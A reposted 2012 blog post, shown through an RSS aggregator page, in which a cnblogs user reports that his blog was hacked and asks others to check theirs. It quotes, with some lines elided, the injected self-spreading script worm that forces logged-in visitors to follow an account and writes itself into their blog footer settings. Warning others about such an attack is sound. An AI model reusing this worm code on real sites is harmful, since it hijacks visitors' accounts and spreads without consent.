惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threat Research - Cisco Blogs
博客园 - 聂微东
小众软件
小众软件
P
Proofpoint News Feed
Security Archives - TechRepublic
Security Archives - TechRepublic
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
TaoSecurity Blog
TaoSecurity Blog
博客园 - 司徒正美
罗磊的独立博客
N
News and Events Feed by Topic
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
S
Security Affairs
S
Security @ Cisco Blogs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
The GitHub Blog
The GitHub Blog
月光博客
月光博客
S
Secure Thoughts
P
Proofpoint News Feed
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Forbes - Security
Forbes - Security
H
Heimdal Security Blog
W
WeLiveSecurity
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
L
LangChain Blog
T
The Blog of Author Tim Ferriss
NISL@THU
NISL@THU
Google DeepMind News
Google DeepMind News
Cloudbric
Cloudbric
H
Hacker News: Front Page
The Last Watchdog
The Last Watchdog
Hacker News - Newest:
Hacker News - Newest: "LLM"
C
Cisco Blogs
博客园 - 三生石上(FineUI控件)
博客园_首页
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
S
Schneier on Security
Project Zero
Project Zero
SecWiki News
SecWiki News
爱范儿
爱范儿
The Register - Security
The Register - Security
AI
AI
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Y
Y Combinator Blog
L
Lohrmann on Cybersecurity
Application and Cybersecurity Blog
Application and Cybersecurity Blog
P
Privacy International News Feed
J
Java Code Geeks
S
Securelist
C
Cyber Attacks, Cyber Crime and Cyber Security
V
Visual Studio Blog

博客园 - 八进制

博客已搬家 Swift开发iOS应用过程中的问题和解决记录 AndroidStudio的一些坑 Eclipse崩溃后无法启动的问题解决 Android 5.0/5.1开发问题专贴 WordPress安装使用问题记录 Arduino单片机使用和开发问题记录 U盘启动笔记本无法安装Win7问题和解决 FreeSwitch安装配置记录 安装配置opensips过程记录 Android SDK开发包国内下载地址 [Android问答] 如何获得手机屏幕分辨率? [Android问答] 开发环境问题集锦 [Android问答] ListView如何加载远程图片?(附代码) [Android问答] 如何实现“退出应用”功能? [Android问答] 旋转屏幕导致Activity重建怎么办? [Android问答] 如何应对Activity进程被杀? [Android问答] 如何理解Activity生命周期? [Android问答] px、dp和sp,这些单位有什么区别?
博客园被黑了?
八进制 · 2012-11-12 · via 博客园 - 八进制

(抱歉占用首页一会儿)

是博客园被黑了还是只有我的博客被黑了?

刚发现我的博客被加入了下面的代码(出现在“管理->设置->页脚Html代码”里,其中一部分被我略去),有没有人遇到一样的情况?请管理员帮忙查一下。

这段代码在我这儿运行以后的效果是自动关注Darrel.Hsu的博客(链接是资料页没有恶意代码,博客有恶意代码,不要在登录状态下访问),到现在这个博客已经增加了几百粉丝(23:44有554粉丝,24:00时有565粉丝)。

Update: 可能是有某位注册用户在自己博客里加了这段代码,然后凡是处于登录状态下的园友访问这个用户的博客后都会被感染;如果处于未登录状态,则跳回到登录页,结果是博客里的所有文章都无法正常打开

被加入的代码如下:

<script>function hack(){
var id = "D_Hacker" + parseInt( Math.random() * 1000 );
function createIframe( src , cb ){
  var iframe ;
  if( ! ( iframe =  document.getElementById( id ) ) ){
    ...//
  }
  iframe.onload = function(){ cb( iframe ) } ; 
  if( src.indexOf("http") == 0 ){
    iframe.src = src ;
  }else{
    var doc = iframe.contentWindow.document;
    doc.open();
    doc.write( src );
    doc.close();
  }
}
var m = ["c", "n", "b", "l", "o", "g", "s", ".", "U", "s", "e", "r", "M", "a", "n", "a", "g", "e", "r", ".", "F", "o", "l", "l", "o", "w", "B", "l", "o", "g", "g", "e", "r"]
m = m.join("")
window.eval( m + '("b8a15066-1039-e011-ac81-842b2b196315")')
createIframe("http://www.cnblogs.com/",function( iframe ){
  var win = iframe.contentWindow;
  var href = $("#span_userinfo a:eq(1)", win.document );
  href = href.attr("href") + "admin/Configure.aspx";
  createIframe( href , function( iframe ){
    ...//
    if( val.indexOf("b8a15066()") < 0 ){
      val = val +  "<scri"+"pt>"+ hack.toString() +";hack();</scr" +"ipt>";
      $("#Edit_txbPageEndHtml",doc).val( val );
      $("#Edit_lkbPost" , doc ).trigger("click");
    }
  });
})
};hack();</script>

不知道怎么联系dudu,而且dudu的博客也被感染了,大家先检查一下自己的博客吧